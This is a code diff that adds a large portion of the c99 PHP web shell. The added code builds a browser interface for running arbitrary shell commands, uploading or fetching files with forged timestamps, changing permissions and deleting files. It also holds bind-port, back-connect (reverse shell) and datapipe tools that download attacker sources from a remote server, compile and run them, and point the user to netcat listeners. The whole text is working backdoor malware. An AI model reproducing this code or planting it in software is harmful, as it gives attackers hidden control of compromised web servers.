+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" method=POST><input type=\"hidden\" name=\"act\" value=\"upload\"><input type=\"hidden\" name=\"d\" value=\"".urlencode($d)."\">
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps -aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  echo "<b>Result of execution this command</b>:<br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     //$ow = posix_getpwuid(fileowner($v));
+     //$gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.sort.value='".$k.($parsesort[1] == "a"?"d":"a").";document.todo.submit();\">";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.sort.value='".$i.$parsesort[1]."';document.todo.submit();\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode(realpath($d.$o))."';document.todo.sort.value='".$sort."';document.todo.submit();\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode(realpath($d.$o))."';document.todo.sort.value='".$sort."';document.todo.submit();\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".$uv."';document.todo.sort.value='".$sort."';document.todo.submit();\">[".$disppath."]</a>";         }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".$uv."';document.todo.sort.value='".$sort."';document.todo.submit();\">[".$disppath."]</a>";
+     }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.d.value='".$ud."';document.todo.f.value='".$uo."';document.todo.submit();\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+     $row[] =  "&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.d.value='".$ud."';document.todo.f.value='".$uo."';document.todo.submit();\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)){$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='d';document.todo.d.value='".$uv."';document.todo.submit();\">I</a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='info';document.todo.d.value='".$ud."';document.todo.submit();\">I</a>&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='edit';document.todo.d.value='".$ud."';document.todo.submit();\">E</a>&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='download';document.todo.d.value='".$ud."';document.todo.submit();\">D</a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  //Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 0;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 0;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(1);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(0);\" value=\"Unselect all\"><b>";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+if ($act == "tools")
+{
+ $bndportsrcs = array(
+  "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
+  "c99sh_bindport.c"=>array("Using C","%path %port %pass")
+ );
+ $bcsrcs = array(
+  "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+  "c99sh_backconn.c"=>array("Using C","%path %host %port")
+ );
+ $dpsrcs = array(
+  "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
+  "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
+ );
+ if (!is_array($bind)) {$bind = array();}
+ if (!is_array($bc)) {$bc = array();}
+ if (!is_array($datapipe)) {$datapipe = array();}
+
+ if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
+ if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
+
+ if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
+ if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
+
+ if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
+ if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
+ if (!empty($bindsubmit))
+ {
+  echo "<b>Result of binding port:</b><br>";
+  $v = $bndportsrcs[$bind["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $w = explode(".",$bind["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%port",$bind["port"],$v[1]);
+    $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
+    else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.grep.value='".basename($binpath)."';document.todo.submit();\"><u>View binder's process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ if (!empty($bcsubmit))
+ {
+  echo "<b>Result of back connection:</b><br>";
+  $v = $bcsrcs[$bc["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  else
+  {
+   $w = explode(".",$bc["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%host",$bc["host"],$v[1]);
+    $v[1] = str_replace("%port",$bc["port"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
+   }
+  }
+ }
+ if (!empty($dpsubmit))
+ {
+  echo "<b>Result of datapipe-running:</b><br>";
+  $v = $dpsrcs[$datapipe["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $srcpath = $tmpdir.$datapipe["src"];
+   $w = explode(".",$datapipe["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
+    $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
+    $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
+    else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.grep.value='".basename($binpath)."';document.todo.submit();\"><u>View datapipe process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ ?><b>Binding port:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
+ foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+ ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
+<b>Back connection:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+<b>Datapipe:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
+foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
+}
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
